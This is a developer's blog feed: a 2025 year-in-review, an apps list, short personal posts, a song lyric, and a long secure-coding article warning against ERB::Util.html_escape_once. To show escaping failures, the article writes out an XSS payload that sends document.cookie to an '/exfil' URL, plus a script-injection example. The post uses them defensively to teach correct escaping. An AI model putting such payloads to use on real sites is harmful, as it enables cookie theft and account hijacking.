- Wrote enbi, which ties up the [anything]–Nix→OCI–k8s trifecta in an unholy and altogether beautiful way. 5 months later and updating anything I run in my cloud is still just a matter of bumping a SHA and pushing to git; no manual messing around with a registry, building images, pushing images, any of it. It just keeps on running without a care in the world. k8s is the SharePoint you can really love.
Learned to do simple CAD; designed and printed a bunch of things to improve our home.
Authored 460 commits on Comrak and shepherded 107 commits from 25 contributors — thank you!!
Played a lot of games! Long COVID means I have so much less thinking time in a day.
- 100%’d a few games: Nova Drift, Hades, and Hades Ⅱ. I really recommend them. Hades Ⅱ was such an incredible follow-up.
- Also got to 5BSC in Dead Cells and collected every outfit (except for Dracula’s because fuck him). Turns out it has an adorable live-action adaptation!?
- Replayed Cave Story.
- Started a new Stardew Valley save and actually reached the “end game”. (Year 3 day 1, all candles!) Previous attempts never made it past the first season.
- Counts as gaming: did Advent of Code for the first time in many years. It was fun and stretched my brain a few times (except for the disappointment that was Day 12), and I topped the work leaderboard. :)
- Got myself back into Silver in LoL in the first half of the year, largely pivoting into ADC! (16–7 on Ashe in S2025 :3 But also 43–36 on Nami.)
- As so many others have discovered — the year of Linux on the desktop is finally here, and a lot of it is thanks to Valve! You can’t imagine my shock at some games running better on Linux on chipset graphics than an M3 Max. That which isn’t thanks to Valve is largely thanks to the two corporate competitors being determined to turn their flagship products into complete and utter shit as rapidly as possible. We can only rely on ourselves.
Saved 512 bookmarks.
Filed three police reports for theft u_u
Visited Canberra for the first time.
Quit medicinal cannabis — cost/benefit crossed the line — and spent months in medication hell figuring out a new way to make sleep possible. Made it, though (guanfacine).
25 doctor/specialist/test appointments. No improvements to overall pain incidence.
Finished up at Radiopaedia. Did a pen-testing contract. Decided to try full-time work again, after nearly 6 years.
Got a pushbike and used it a bunch!
Watched quite a bit of 非诚勿扰, lots of LoL, and (new for me) a couple CS2 tournaments.
Watched consensus reality go to hell.
Loved my wife.

What’d I intend?

Keep up Duolingo: did that! I got every monthly badge, meaning I did at least 600 “quests” in the year. I found that was a nice way to ensure I spend actual decent time learning.
Daily meditation: I saw that through to day 280 or so, averaging 15 minutes a day.
Home-cooked meals: whew. Mid-year was a bit heck for that, but we’ve been doing so much better lately!
Deliver the Ava MVP: called that spike in February.
Secondary project: ended up fielding a lot of those!
Keep learning: really well done! (Not much from that list, though I did end up using Quint at work to elucidate problems with an existing design and prove a better one, and out of luck encountered a problem where I knew both (a) that an SMT solver would solve it generally, and (b) how to instrument one to do that!)

things that were a pity in the year of our lord 2025

2026-01-04T06:36:39Z

covid¹
the climate (we’re fucked)
societies’ attitudes to trans people
llms

Maybe one or more of these can let up in 2026 🤞

Still extremely a thing[1][2][3][4][5][6][7][8][9][10][11][12][13][14][15][16][17][18][19][20][20][22][23][24][25][26][27][28][29][30][31][32][33][34][35][36][37][38][39][40], but let’s face it, if you’ve given into peer pressure by this stage (and it was probably years ago that you did, given how extreme it’s been!), there is no turning that ship around now. ↩

Apps I Use

2025-12-10T01:55:41Z

From Abhinav Sarkar, with additional inspiration from Ruben.

App launcher: Alfred, KRunner, both default to Comenzar
Backups: Time Machine, borg
Bookmarks: Linkding
Books: Kindle
Browser: Librewolf
Build system: Nix
Calendar: iCal
Cloud storage: iCloud, Minio-on-k8s
Code editor: Emacs, Helix
Contact management: Contacts.app
Default language for one-liners: Ruby
Default language for ten-liners: Rust
Email: FastMail (Mail.app on Darwin, webmail otherwise)
Git client: jj
Kubernetes: k3s
Linux distribution: NixOS
Music: Music.app/mpd
News: abc.net.au
Notes: A4 notebook, Apple Notes
Password management: 1Password
Photo editing: Pixelmator
Photo management: Photos.app
Photo shooting: iOS default, Canon EOS R5
Read later: Linkding
RSS: Miniflux
Shell: fish
Shopping list: Paprika
Smart home: Home Assistant (HAOS as suggested by Mislav) with TubesZB Zigbee coordinator
Terminal: Ghostty
To-do: Things
Video: VLC
VPN: Mullvad
Window management: Darwin default, KDE Plasma, tmux
Word processing: CommonMark

boost: In Praise of dhh by Filipa Mendonça-Vieira

2025-11-10T00:39:29Z

https://okayfail.com/2025/in-praise-of-dhh.html

pipa! pipa!

2025-11-05T10:32:49Z

Thanks to the Pipa Index and actually working in the open, I’m able to publish what I’m working on! Have a look :)

just use rustup

2025-11-04T03:37:05Z

I’ve been thinking for a little while that I should look into trying to contribute to the Rust compiler, since it’d be fun if I could understand what’s going on under the hood better. I’ve done a bit in the Zig stdlib, but nothing on the compiler, and while I have some Co-authored-by:s in Ruby, I wouldn’t write home about it*.*

And so sans any context whatsoever, I start to say out loud: “y’know, I think it’s finally time I—”

Annie cuts me off sharply: “just use rustup.”

Ow /s

reminder to nix-collect-garbage

2025-11-01T02:51:51Z

🐰🐰🐰

One month at GitLab

2025-10-20T11:40:41Z

Despite my absolute lack of love for Ruby on Rails (and revilement for certain persons at the project), I have embarked on my tenth year of working for pay on very large, very highly used, and — how should I put it — very well-loved Ruby on Rails codebases.

It’s been lovely. I was pretty worried about energy requirements, having not worked full-time since 2019, but so far I am managing. Despite the whole Situation with the tech industry, I have gotten away without interacting with a single LLM yet, and I am betting I can just hold on like this until the bubble pops. So far I am mostly doing security-related work and getting out small fixes or improvements fast, and that suits me very well. I have very chill coworkers. Working in the open like I do with all my personal stuff is such a nice change from a career of mostly closed-source work.

The work has also made it a lot easier to feel for my largest open-source baby, Comrak, especially given my job now directly involves using it! I just now pushed out a bit of a monster release candidate, and I’m feeling good about it.

Selamat malam!

ERB::Util.html_escape_once: not even once.

2025-10-12T08:54:22Z

Alternative title: “ERB::Util.html_escape_once considered harmful”.

Advice: Do not use this function. This function has no real-world, safe uses. Eschew it. Reject it from your codebase. Ratchet it out of existence.

Motivation: How many useful encoding or escaping-adjacent functions do you know of that are irreversible? What about ones which irreversibly blur the lines between trusted and untrusted content?

This article has eight “chapters”.

Text
From text to HTML
Text in HTML
HTML in HTML
Trust levels
Diagrammatic tl;dr
Postscript: on automated HTML safety
Postscript: on tags that aren’t tags

Text

Let’s say you’re writing a to-do list app for your hot new company, ToDoIfy®. An enterprising young web developer comes along and wants to use your to-do list app to write their to-do list app! If frontend development tutorials are anything to go by, to-do list apps are all we’ve got.

Here’s their first to-do:

Add <input> for to-do entry

They hit submit, and are taken back to their to-do list page. Their to-do list to-do list? It looks like this:

Jeez, that’s embarrassing. They report the bug to us, and we hastily add a call to html_escape¹ or escapeHTML or whatever the ecosystem equivalent is. This article isn’t really about Ruby, but it’s certainly inspired by it!

Phew! IPO saved. What’s the actual difference in HTML received by the web browser in these cases?

-<li>Add <input> for to-do entry</li>
+<li>Add &lt;input&gt; for to-do entry</li>

escapeHTML replaces characters that could be recognised as comprising HTML tags or character references² with character references that represent those characters. In other words, < might be seen as the start of a tag, so replace it with the character entity reference <, which represents the character < in a text node or attribute value without it being possibly parsed as anything but text.

This function will also replace >, " and ' with >, " and ' respectively. These are all essential in ensuring that you can drop a value into a tag’s attribute value without unexpected meaning switches. <img alt=funny>? Not so funny if the alt text is user-supplied and they choose the value ><script>window.location.href='https://66.66.66.66/exfil?'+document.cookie</script>³.

Importantly, it will also replace & with &, otherwise there would be no way to actually write the text < on the page without it disappearing into a <. You write &lt; in HTML to get that text.

Now, these are fairly cursed circumstances we’re discussing to begin with — why are you piecing together HTML with strings in the first place? — but these are fairly cursed times we live in, and sometimes that best-avoided is unavoidable.

From text to HTML

The IPO was a great success, and ToDoIfy® has received seventy Marc Andreesen’s worth of investment. Baby, we’re going rich-text! A team of prompt engineers put their best agents onto it, and at the low low price of 63×10¹⁶ tokens, the Orinoco River and 18% of the world’s remaining biodiversity, we now have a WYSIWYG editor for to-do entry. Bold, italic, even underl— wait, no. No underline. But bold and italic, you betcha!

Our web developer sees the announcement, and decides to try over with a new account. They once again type:

Add <input> for to-do entry

They are taken back to the index and are greeted with this monstrosity:

What happened!? I thought we escaped it and fixed everything?!

And we did — but the nature of our input changed. In the Before Times, we were receiving text, and throwing text directly into HTML means interpreting text as HTML, leading to the brokenness⁴ we saw in the first screenshot. We escape text before placing it into the raw HTML output stream, ensuring it is interpreted solely as text.

In the After Times, however, we’re receiving HTML. When our user typed Add <input> into the WYSIWYG editor, the HTML they submitted to the backend looked like Add <input>. Escaping that same HTML leads to us treating the HTML as text, so the entities² become visible!

At this point, our backend developer team is scratching its collective head. We have a problem. See, we have billions (maybe trillions) of rows from the Before Times, and they’re all full of text input like Add <input>. But it’s been just over half an hour since the WYSIWYG editor deploy and we’ve already nearly reached a million rows of HTML input like Add <input>⁵. If we stop escaping the output, all the old rows will become radioactive and hazardous! If we don’t, though, all the new ones will look awful! What to do?

Aside: is this the punchline? (It is not.)

At this point, one might think: hey, is there some way we can only escape entities that need escaping? And there might be, but the problem is, definitions of “need” vary. ERB::Util.html_escape_once cannot save you here: its definition of “need” is: if there’s a <, >, ', ", or a & that doesn’t look like it’s part of a character reference, escape it!

So sure, our Before Times Add <input> correctly turns into Add <input>. And our After Times Add <input> doesn’t get messed with. Great!

Unfortunately, it breaks our actual WYSIWYG support — <b>Raise $100,000,000mm</b> from the frontend becomes <b>Raise $100,000,000mm</b> when it gets put onto the page, and just like that we undid all NVIDIA’s hard work.

We hire a human consultant to “brain solve” this and they suggest we either escape all the rows from the Before Times (so our column now consistently stores HTML), or add a version marker so we know to process the rows differently in output. OK, fine, whatever, we had to convince payroll to pay an actual person and not just the Holy Trinity or Corporate Centipede or whatever they’re called these days, but everyone’s saying that the agents won’t even let this mistake be possible when GPT-26 lands with something they’re referring to in alpha release notes only as “The Swarm”. It’s fine.

Text in HTML

So far, so webscale. We haven’t turned a profit yet, but we’re pretty sure this next DeFi–LLM integration will be a game changer.

The feature design is simple. It’s too simple. It’s brilliant. This changes everything. We add an input to the new to-do page, where you can enter a list of DeFi tokens your to-do is related to. On the to-do list, you can hover over any of your to-dos to see which tokens are part of this “connected experience.” We use the title attribute on the <li> to make this happen.

Please imagine together with me, for a moment, that it was easier to take a screenshot with the mouse cursor still visible in it than it was to write this sentence of apologia:

To be honest, we haven’t worked out how to get the LLM in here yet, but it’s a must-have for our investors so stand by for some proprietary patent-pending LLM tech⁶.

Because we have the organisational memory of a goldfish, we just threw these entries right into the title attribute. The inevitable happened — namely, a fifteen-year old intern called Creighton with a typing quirk — and shortly after our app was graced with this:

rakali coin <"$rkl">

Creighton was, in turn, graced with this:

Oh no :( Let’s not think too much about where our poor $rkl went.

The thing is, the intern got hired long after this feature went out, and — what did I tell you about goldfishes — someone making a client app already started sending HTML into these rows too. I mean, they don’t work like HTML — if you type a < you see a < in the tooltip on the website, it’s just a title attribute — but it was an Electron app using a contenteditable="plaintext" so the entities got encoded by accident.

The funny thing is, those items actually worked better. See, when Creighton tried using the client app to do the same thing, what made its way into the database was instead this:

rakali coin &lt;&quot;$rkl&quot;&gt;

And that works just fine when you view it on web! Really, it’s just the web frontend inserting the wrong stuff in the backend. but it’s too late to change that now. Can’t you fix it so they both look good?

The dread head of ERB::Util.html_escape_once rises once again. It Makes Them Both Work, so it must be good, right? It’s committed and we move on — there’s an exciting new collab deal to chase!

<li title="<%= ERB::Util.html_escape_once(todo.related_coins) %>">

HTML in HTML

Someone, somewhere, announces that system UI tooltips are So Web 1.0. Isn’t there a Prototype.js plugin for tooltips or something? Can we jQuery this? Is it on Bower?

Someone, somewhere, briefly considers accessibility before they— haha jk lol no they don’t. They change the title attribute to data-tooltip, add 28 nested dependencies to package-lock.json and 900 kilobytes of minified JavaScript, straight in the <head> tag (“it caches better”, they reassure you), and call it a day.

<li data-tooltip="<%= ERB::Util.html_escape_once(todo.related_coins) %>">

It works great, and yet, not a day passes before someone says — hey, that cool tooltip that appears is just a <div>. Can we style that?

Well, uh, yeah, I don’t see why not. I have to add data-html to tell ToolTippr v5 to let us style it, but now wrapping the value in <marquee> works just fine!

<li data-tooltip="<%= ERB::Util.html_escape_once(todo.related_coins) %>" data-html>

Actually, it works fine whether we wrap it before or after the html_escape_once call.

Actually, it works fine whether we write it <marquee> or <marquee>, whether we do it before or after the html_escape_once call.

Isn’t something fishy about this? Are your spidey senses not tingling?

Trust levels

It can be hard to wrap our heads around what’s exactly happening when we escape and unescape things. Or escape things “once”. I wrote about this at length, nearly a decade and a half ago, and 21 year old me’s conclusions still ring true today, even if they’re a little trite:

Data in your application should mean what it means.

When data comes in, interpret its meaning once, according to context.

When data goes out, encode it meaningfully according to context.

Let’s analyse the meaning of some functions in this area, in any language ecosystem; not the how, but the what:

Functions variously called escapeHTML, html_escape, html.escape: take some text and render it into HTML in such a way that it represents the same value when encountered in a text node or attribute.
- I have the text 100 > 50. I want the HTML equivalent of this. I put it through escapeHTML. I get 100 > 50. That’s HTML, and if I put that into a tag, that tag will contain a text node with the content 100 > 50. Perfect.
Functions variously called unescapeHTML, html.unescape: take some HTML as encountered in the body of a text node or attribute, and render it into text in such a way that it represents the same value.
- I read the HTML <p>100 > 50</p>. I want the textual content of this and for reasons knowable only to myself and the Lord above, I will do it without an HTML parser. I strip tags and I’m left with 100 > 50. I run that through unescapeHTML, and I get 100 > 50. Passable.

These functions are complimentary, and indeed, unescapeHTML(escapeHTML(x)) will always equal x.

(It’s really important to note, however, that escapeHTML(unescapeHTML(x)) will very often not equal x, with security-catastrophic consequences, and I will get to this.)

But first, let’s try to describe the “what” of html_escape_once. What would that be like?

Take some .. text? Well, no, not really — it might contain entities, the whole point of the _once bit is we don’t want to touch entities, so we’re conceding it might not just be text.

Take some HTML? Well, uh, no, we’re explicitly trying not to do that. If there’s HTML tags in there, we want them escaped!

Take some text-ish HTML and render it into HTML in such a way that whatever looked like HTML is treated like text but things that look like HTML entities are treated like entities, in such a way that it represents, uh. Something.

This is Wonked, and the reason is in the messiness of this definition. When do we have text-ish HTML? The answer is, hopefully never. If you’re already that far gone, you’re screwed, right? You can never consistently treat it as one or the other. If you html_escape_once some text-ish HTML, you’ve turned it into “just HTML” (albeit HTML that will almost certainly represent something illegible at some point), but you can never, ever unescape it again. Why? You’ve mixed text and HTML into the same “trust level”.

Text in its unadulterated “text” form is something we can handle safely. We can store it in a database field, knowing it faithfully represents some input exactly as intended. We can put it in a text node in the DOM. We can escape it and put it in HTML, although hopefully our framework is doing this for us.

Importantly, if you do escape it into HTML yourself, you know the resulting HTML is also trusted, and safe for display. The user-controlled portion has been neutralised. You could write, say, <b>#{escapeHTML(user_text_input)}</b> into a .html file, and you know that if they typed Add <input>, when you open that file, you should see those very letters Add <input> in bold, with no surprise textboxes.

On the other hand, if you receive HTML from the client, it is not trusted. Even if it’s meant to come from your own editor, there’s nothing stopping them sending you <script>blahBlah.megaEvil()</script> anyway and mixing that into your output without the appropriate steps is a recipe for an Our Incredible Journey at a huge loss.

You sanitise the HTML, though, and it’s looking great.

You’re not clocking it, are you? You’re not clocking that I’m standing on business. Sanitisation won’t save you — this is an entirely different problem.

Creighton, the lovable scamp, enters his latest coin into the app’s WYSIWYG interface, with a little extra their website told him to do:

Katydid Coin $$$KTDC <script src=https://katydid.coin/win.js></script>

As we mentioned, the app is sending HTML, so we feel pretty safe because this is what goes down the wire, and into (and out of) the database:

<p>Katydid Coin $$$KTDC &lt;script src=https://katydid.coin/win.js&gt;&lt;/script&gt;</p>

We can sanitise it going into the database, or we can sanitise it before preparing for output. Or both! This is safe. There’s no nasty tags in here, just text in a paragraph.

What’s our frontend HTML look like again?

<li data-tooltip="<%= ERB::Util.html_escape_once(todo.related_coins) %>" data-html>

Remind me what happens when we html_escape_once that string above? < and > get escaped, but none of the < or >. We end up with this:

<li data-tooltip="&lt;p&gt;Katydid Coin $$$KTDC &lt;script src=https://katydid.coin/win.js&gt;&lt;/script&gt;&lt;/p&gt;" data-html>

Now, when ToolTippr v5 reads el.dataset["tooltip"] to insert HTML into the tooltip <div>, what does it see?

<p>Katydid Coin $$$KTDC <script src=https://katydid.coin/win.js></script></p>

:') I hope your CSP policies are good. If we’d used good ol’ plain escapeHTML, this wouldn’t have happened!

We can say that escapeHTML encodes text as HTML, preserving the level of trust while changing the acceptable context for the value. The corollary is that unescapeHTML decodes HTML into text (though it only preserves the level of trust inasmuch as you originally encoded it as HTML to begin with; again, more on this later).

html_escape_once encodes text as HTML, preserving the level of trust, except for entities in the original text, which are left untouched, and migrate a level of trust “upwards”. The output is of mixed trust, in a single string. Here be dragons.

Diagrammatic tl;dr

Here’s what happens when we’re just escaping and unescaping HTML like we used to do in the Good Old Days, when men were real men, women were real women, and enbies were real tired of your shit:

All those “I’ll get to it in a moment” bits come good here: you can’t unescape content that you didn’t escape first yourself. I mean, you can, but here be dragons strikes again. Note the dashed line which represents the Rubicon: once you pass it, you’re stuck on the other side. You’ve mixed trust levels again.

Meditate on the undesirability of ending up above the dashed line.

Now let’s involve that horrible cousin of escapeHTML who was always mean to us at Easter gatherings, html_escape_once, and see how the picture changes⁷:

IS IT BETTER? I THINK IT’S WORSE. This is what I really mean by mixing trust levels, and how html_escape_once makes that so easy. It either does nothing, OR, it ruins your week. Or your week was already ruined. Either way, if it’s lurking in your codebase, you can practically guarantee it’s doing (a) nothing, or (b) nothing good.

Do not use this function.

Postscript: on automated HTML safety

Most templating ecosystems have something good for this, and provided you keep the input correctly marked as HTML-safe or -unsafe, it can work out for you safely and correctly with no extra work.

That’s a big “provided”, though, and even moderately-featured user content HTML pipelines are often doing many operations on a document, pulling in various sources of content (many of which are user-controlled; user names, item descriptions, custom statuses …) and layering on ever increasing amounts of complexity before ever getting near the frontend templating system.

If you’re comprehensively using the templating system, or only working on a DOM and serialising once at render, you are in God’s country, and I envy you. If not, may this advice help you steer the course.

Postscript: on tags that aren’t tags

A lot of the wonk here arises because these are functionally equivalent, meaning a modern browser will interpret them as exactly the same:

<div data-tooltip="<p>Hello, world!</p>">x < y, fr fr!</div>

<div data-tooltip="&lt;p&gt;Hello, world!&lt;/p&gt;">x &lt; y, fr fr!</div>

This may seem at odds with what I’ve told you, but regrettably, it is not.

The easy part⁸ is the content of the <div>. If a < isn’t part of an HTML tag, it just doesn’t interrupt the text node it’s a part of! Of course, if you reserialise that text node, you’ll get a < back out, but they are functionally equivalent. Maybe the former will fail some W3C validator somewhere, y’know, when taken in a time machine back to the late 90s.

The harder part, which can lead to much weeping and gnashing of teeth, is the data-tooltip attribute value. An HTML tag’s attribute value is just text — it’s not a tree, and so we can’t have a tag-like construction do anything in there. Entities are still processed, since otherwise there’d be no way to put a double-quote inside a double-quoted attribute value, which means that in an attribute value, < and < are totally equivalent! They both represent the character < in that value. Maybe there would be world peace today if bare < was forbidden, but HTML does not forbid.

This is where things can get really screwy with writing HTML “by hand”. <p>Hello, world!</p> and <p>Hello, world!</p> mean the same thing when they’re put into an attribute value, but very different things outside one. The answer is to always escape attribute values when writing them out — then they mean different things inside an attribute value and outside one — ideally in a generic method far away from any user concerns, or just serialise a real DOM in the first place!

This screwiness in attribute values combines particularly well (poorly) with html_escape_once — note that it always has no effect on how an attribute value is interpreted, because it only changes characters to entities that wouldn’t get special treatment in an attribute value anyway!

DO NOT BE LED INTO TEMPTATION. “It has no effect so it does no harm, right?” WRONG. All the preceding paragraph is telling you is that putting unescaped content where an attribute value is expected will end up mixing trust levels even without your help. See the second diagram above — it’s the one wonky purple line that’s crossing the Rubicon! In this context it’s also equivalent to unescaping the HTML once⁹, which is the other way to cross that line! It’s bad! It’s so bad!

The solution is to uniformly escape the value going in. If you maul the value with html_escape_once — essentially pre-empting the damage this fun parsing mode might do by doing it to yourself first — there is likewise no recovering.

look at that comment. Look at the example irb session in the docs. Can you guess what’s happened here? It’s not the documentation’s fault …

I wonder if APIdock uses html_escape_once? ↩
the word “entity” is often used in a very slipshod way to refer to character references themselves (of both the numeric and entity kind), and sometimes to even the characters that are replaced by functions like this, and I will continue this great tradition. Arguably this contributes to the confusion in the landscape, but I submit that if you can’t differentiate your input from your output, you’re cooked regardless of terminology. ↩ ↩²
of course, you’ll need quotes around that attribute value anyway if there could possibly be a space in the user input, as escapeHTML doesn’t replace whitespace with entities (though you could!), and that’s where the " and ' replacements come in. ↩
make no mistake — this is a severe security issue that could cost you millions of dollars in damages, security bounty payouts and lost shareholder confidence! ↩
I am straight-up not engaging with the problem of sanitisation of user input in this post. That’s a whole different kettle of fish and not to be conflated with correct handling of levels of escaping/trustedness in the first place, and by not engaging with it I hope to disentangle the two concepts ever so slightly. Remember that you cannot trust the frontend at all, and motivated users can and will send whatever they want to all of your backend APIs.

Please remember too that you cannot fix one of these problems with the tools for the other. Running a sanitiser won’t help you if escaped HTML finds itself being unescaped down the line or in the browser. ↩
it’s an OpenAPI call. ↩
unlike escapeHTML, all of my cousins are lovely people! I think there’s some rule for trans people that immediate family is extremely hit or miss, but somehow extended family is almost uniformly supportive. ↩
not so easy for my syntax highlighting tho lol! <span class="tag"> indeed. ↩
Say you start with this value, which we want to put in an attribute:
```
<p>Creighton loves &lt;script src=Web3&gt;&lt;/script&gt;</p>
```
If we put it straight in …
```
<div data-tooltip="<p>Creighton loves &lt;script src=Web3&gt;&lt;/script&gt;</p>">
```
… it gets interpreted as the value <p>Creighton loves <script src=Web3></script></p>.

If we html_escape_once?
```
<div data-tooltip="&lt;p&gt;Creighton loves &lt;script src=Web3&gt;&lt;/script&gt;&lt;/p&gt;">
```
No change. We are still beset by token swaps and smart contracts.

If we unescapeHTML?
```
<div data-tooltip="<p>Creighton loves <script src=Web3></script></p>">
```
Also no change! Truly we are of the damned.

What about a regular escapeHTML?
```
<div data-tooltip="&lt;p&gt;Creighton loves &amp;lt;script src=Web3&amp;gt;&amp;lt;/script&amp;gt;&lt;/p&gt;">
```
How’s that interpreted? Madre mía:
```
<p>Creighton loves &lt;script src=Web3&gt;&lt;/script&gt;</p>
```
#blessed. See the second diagram again to track this, keeping in mind that the particularities of attribute value parsing are as if a single round of unescapeHTML were applied to the raw string that makes up the value in the HTML. If you don’t escape it once yourself, you cross the Rubicon by default. ↩

tired

2025-10-11T10:50:01Z

Wish I could feel rested again. I’m starting to forget what that would even be like.

"i like making things—" no. you like things.

2025-10-09T06:52:27Z

A review or synopsis of a book can never replace the experience of reading it yourself: contemplating ideas for hours and 100s of pages as each sentence is carefully consumed. In the same way, skimming summaries of completed AI tasks robs us of forming a deep understanding of the domain, the problem, and the possible solutions; it robs us of being connected to the codebase. Taking the plunge into the abyss of one’s ignorance to reveal, learn, and understand a topic and its implications is both gratifying and crucial to good software. Ownership, agency, and deep, fulfilling work have been replaced with scattered attention spent between tabs of Agents.

The Programmer Identity Crisis: On AI, Creativity, and Craft

important

2025-09-29T13:40:37Z

read this

Let's give Comrak a home with mama

2025-09-26T04:17:50Z

I thought it was probably about time Comrak had a better landing page than a README. It’s a little bit cute and Markdown themed!

→ comrak.ee

Post-install message from httparty

2025-09-18T07:24:21Z

When you HTTParty, you must party hard!

kodus

2025-09-14T11:19:46Z

no politics!! unless, of course, we are discussing tolerating nazis or ragging on CoCs :)

2025-09-09T14:12:34Z

In what I’m sure is not a sign of the times, just a week later we have this beauty. See if you can spot where a leap was made that surprised me!

Submission title: We will not accept changes created with the aid of “AI”.

Top-level comment:

[…] if the code is right, I don’t care that it was written by an AI, a Nazi, or even a dog.

This in the same discussion where the “Nazi bar” idea has already been brought up twice.

In what I can only accept as the universe consistently striving to deliver us fresh humour, the same comment concludes:

If it’s wrong, it doesn’t get a pass just because it was written by a staunch feminist.

Phew! Up until that sentence, I was starting to really get worried they might accept bad patches from feminists based on their activist credentials alone! Crisis averted—now we can get back to reviewing @1000YearReich’s behavioural profiling PR in peace.

resources for improving as a software engineer

2025-09-06T09:48:29Z

Been too sick to do anything but play Stardew Valley lately, but hey, I’ve never gotten past day 20 before, and now I’m having a lovely time :)

A little while back, a lovely person reached out and asked for some advice. After some interesting discussion, they asked if I had any good resources that helped me improve as an engineer. I feel like my reply might be more helpful generally; here it is.

I’ve been thinking on your question for a while; it’s hard to pick out single things, but here’s a start after going through my bookmark archive:

https://www.infoq.com/presentations/Simple-Made-Easy/ — I very rarely watch talks, I have bad hearing/audio processing and find them really inefficient besides. (Same goes for podcasts; I’d rather read something and be able to scan through it or search it; I’m not spending an hour listening to you and some other guy with impossible accents mumble interrupted only by ads for Audible.) But this, this one I have watched, quite a few times, and recommended it a lot back when it was new (2011). You don’t need to know or care about Clojure to get the most out of this.
https://prog21.dadgum.com/ — this guy knows what’s good. Consider starting with any interesting looking titles from the lists on the homepage, and then scan the archive.
https://blog.regehr.org/archives/942 — random good post. At the end he says: “Finally, we probably need to do more code reading in class.” I would emphasise this. Read much more. Get very, very comfortable diving into new codebases to add tiny features, fix bugs, or to diagnose/understand why something happened the way it did. (Nix is an actual super-power when it comes to just diving into new environments, and is very worth the effort to grok, for so many reasons, despite its steep learning curve. Here is a post on Just Diving In to something, when I decided to replace the Markdown library at the core of a Fediverse/ActivityPub implementation with my own. Here is another one where we add our very own bespoke feature to git, in a way where we get to keep it forever, even with upgrades, new machines, everything.)
https://ferd.ca/lessons-learned-while-working-on-large-scale-server-software.html — another random good post, and Ferd writes a lot of other good stuff too; scan the archive.
https://www.youtube.com/watch?v=F785myaMdR8 — another talk, this one from last year instead of last decade. Dude has a big personality, and some of the time you might wonder why he loves the word “modality” so damn much, but he gets at something important — something increasingly lost as folks continue to drink the “we’ll all be prompt engineers in a few years” Koolaid while trying very hard to ignore the material reality of “but what’s going to be funding this” and the more abstract reality of “perhaps abdicating thousands of tiny decisions to an RNG is not, strictly speaking, the best way to improve our ability to construct systems we understand and can maintain”.
https://ratfactor.com/papers/naur1 — further to that last point, this is a (commentary on a) classic text by Peter Naur, who diverged from the (then more dominant) idea that programming was a kind of mathematics. The text is linked at that first dot-point. I’d suggest reading the commentary/summary first, and then the original if your interest is sufficiently piqued.

Outside learning resources like this, I’d suggest:

Get really comfortable with using your VCS. Learn to do black magic with git, and learn to do it fast. This will probably take a lot of aliases — scroll down to the “Git aliases” section on this page to see what I mean. You’ll write bad quality commit messages like “update project files” if you have to type out “git add blah” and “git commit” and “git push” every time you commit, and you’ll make larger, less useful, less self-contained commits too. If staging just what you want and committing and pushing it as as simple as “a”, “c”, “w”, you’ll do it more often. If amending a commit is as easy as “cx”, and reordering commits is as easy as “ri HEAD~10”, you’ll do it more. This is a basic observation from linguistics: more commonly used words/signs evolve to become shorter/simpler. Apply this to your own environment: see what you use most (check your shell history! pipe it into sort/uniq and find out what you do most!), create aliases for those, and retrain yourself to use them. (e.g. with git, create an alias for git itself that just instead echos “bad! use the new aliases!”, and after a dozen or so tries you’ll get it. You can apply this technique in lots of places where your muscle memory would otherwise prevent you from adopting an improved/different workflow; see also unbinding keys in your editor.)
- I’d suggest learning jujutsu, too; per that README, it’s what I use 100% of the time now, as an interface to git repositories! This post contrasts them a bit, and this one in a specific case.
Per above, Nix is a wonderful way to accumulate learnings and improvements in a way that is version-controlled and reproducible.

I hope these links and ideas prove enlightening, or at least interesting!

how to leave lobste.rs for good in 3 easy steps

2025-09-01T11:48:20Z

This weekend’s absolute fucking shit-show could’ve gone better¹, and for the second time² — after some well-intentioned efforts by Lotte in that thread that ultimately left her feeling even more burnt out and apathetic about humanity — decided I was done for good.

Here’s how you do it:

Change your email address to something no-one can ever access — the .example TLD is a wonderful provision for this purpose. You do not need to verify your email address to change it, which is why this works.
Delete your account normally.
Profit!

You can only reactivate your account by resetting its password, which involves you receiving an email that can no longer be received.

11.5 years and 1500 comments later — good. bye.

best hits:

thanks for re-opening that can of worms, mtlynch! love that for queer folks! ↩
this was the last straw (the second!) after SO MANY conversations that left me feeling utterly dead. allies, please understand — it’s not enough to upvote. there are way more of them, and they are a lot less exhausted. ↩

nóssa: now with a prettier homepage!

2025-09-01T11:24:35Z

Now that I can bump the software in my cluster with just a push, I finally decided to make the homepage (and userpages) of nóssa much, much prettier! Have a look sometime, if you like :) → https://nossa.ee

SLITHER

2025-09-01T04:10:07Z

https://blackdresses.bandcamp.com/track/slither

1. we slithered out of your reach. all of us had someone like you to run from. our wings were clipped and our limbs were damaged but we crawled and picked our way out as far as we could.

2. we lived by the water. took care of something that made its home deep below the surface. the mother of the depths returned our kindness by giving us her flesh to sustain us. she was sick and diseased like we all were, but she kept us alive.

3. things settled and some of our feathers started to grow back, a different color than before. our bones began to heal - at new angles, but almost as strong as they used to be. we held each other close at night and whispered that things were different now. things were safe. we had to be reminded nightly, or else we’d forget.

4. you found us. you came while we were sleeping. you talked with warm familiarity and i threw up at your feet. you asked me what was wrong - sincere - and i couldn’t answer. i wish it was easier to hate you. i wish you were a bad person, but instead i just think that i am for wanting that.

5. we drove you away, haltingly. i told you i needed more time as if i hadn’t already decided what you were to me. i wish you knew what you did, but i don’t want to tell you. it would be easier if you were something i had nightmares about instead of ugly, complicated dreams. i want to flatten you into a villain but i think that would only turn me into one. please leave me alone. i’m happy now. i’m happy here. please don’t look for me. i promise i’m okay. please go.

listen to me. i’m going to speak plainly
i’m not going to say your name. i’m afraid
because of what i know you won’t mention
all those years of horrible tension
i don’t think youre a monster, hardly
i just think that you fucked up, badly
i can never tell you what you did to me
so i have to settle for this, i hope truly
that you never hear these words that i’m speaking
this is just for me as i’m healing.
it’s not my fault that my soul is a war
that i don’t want to say i love you on the phone anymore
i blame you. but i don’t want to hate you
…but maybe that’s because i’m afraid to
there is a memory of when i was young and i admired you so much.

we got away
but everything reminds us

i admired you so much

6. what comes next? is there anything after? where will we go to now? who will we become?

i wonder.

i’ve never wondered before.

—

everything always changes but its always the same
everything always changes it flickers like flames
everything always changes dice roll to a different face
everything always changes new skin new name
everything always changes but its different sides of one thing
everything always changes in a circle in a ring

enbi: fully operational!

2025-08-31T09:30:09Z

